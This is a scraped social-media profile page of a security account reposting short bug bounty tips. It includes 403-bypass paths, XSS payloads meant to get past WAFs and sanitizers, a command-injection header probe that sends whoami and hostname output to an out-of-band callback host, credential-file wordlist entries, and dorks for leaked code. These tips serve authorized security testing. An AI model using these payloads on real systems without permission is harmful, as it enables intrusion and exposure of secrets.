RootMoksha Labs
@RootMoksha
Followers
7K
Following
43
Media
639
Statuses
1K
Cybersecurity focussed Bitcoin venture studio
Joined November 2023
403 bypass methodology ! 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips by @viehgroup
0
52
246
1
31
155
Use Uncover for recon purposes uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei uncover -q target -f ip | naabu echo jira | uncover -e shodan,censys -silent #bugbountytips by:@infoscresearchr
#BugBounty
0
1
15
Do wayback on root domain then get endpoints and add it to your list and fuzz on subdomains or other roots.. $ ~ waybackurls https://t.co/GG8FK8E2OW |cut -d "/" -f 4-|sort -u > endpoints.txt #bugbountytips by @111xNagashy
#BugBounty
1
28
182
Add the file `wp-config.php.txt` to your wordlist, and you might discover some juicy data. #bugbountytips by @NoRed0x
#BugBounty
1
15
84
"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #bugbountytips by @0x0SojalSec
#BugBounty
1
32
198
Subdomain Enumeration Using Web Archive This Bash function extracts subdomains from Web Archive results! Add it to your ~/.bashrc: function wayback() { curl -sk "
https://t.co/ysg7p6fq4Q…" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u } By: @Sp1x0r
#BugBountyTips
0
9
37
If you come across a Windows IIS server, definitely scan the shortname and try to obtain the files by fuzzing, this may allow you to find vulnerabilities like 'CVE-2024-39677: NHibernate SQL Injection Vulnerability ' By:@ynsmroztas
#BugBounty #bugbountytips
1
37
189
an XSS payload to bypass some waf & filters in Firefox <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> Credits:@0x0SojalSec
#bugbounty #bugbountytips
1
40
187
RCE - Can we still use this in HTTP Header? ` ' ; $ > curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server By:@gudetama_bf
#bugbountytips #BugBounty
0
2
14
Add the file `yahoo_site_admin/credentials/db.conf` to your wordlist, and you might discover some juicy data. Credits:@NoRed0x
#BugBounty #bugbountytips
0
2
7
Tool To Test Machine Keys In View State 👇 https://t.co/jVVQciZe8i By: @GodfatherOrwa
#BugBounty #bugbountytips
github.com
This Tool To Test Machine Keys In View State. Contribute to orwagodfather/AspDotNetWrapper-Edited- development by creating an account on GitHub.
0
7
39
Google Dorks - Code Leaks site:pastebin. com "example. com" site:jsfiddle. net "example. com" site:codebeautify. org "example. com" site:codepen. io "example. com" Credits: @TakSec
#BugBounty #bugbountytips
1
22
116
Subdomain Takeover Detection with Subfinder & Nuclei -new wordpress takeover detection for nuclei template subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target https://t.co/xX8JrKEQoT Credits: @TheMsterDoctor1
#BugBounty #bugbountytips
0
57
190
Nuclei Template : REFLECTION Potential XSS, SSRF, Cache Poisoning, Open URL Redirection & OAUTH Redirection nuclei -t reflection[.]yaml -u target Credit: @gudetama_bf
#BugBounty #bugbountytips
0
21
57
Wordlist for fuzzing hidden database files https://t.co/a9xp6hvwE0 Credits: @KonwarAbhi98099
#BugBounty #bugbountytips
0
64
215
Google Dork Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints python dork[.]py -d "site:*target filetype:php" Credit: @gudetama_bf
#bugbountytips #BugBounty
1
39
153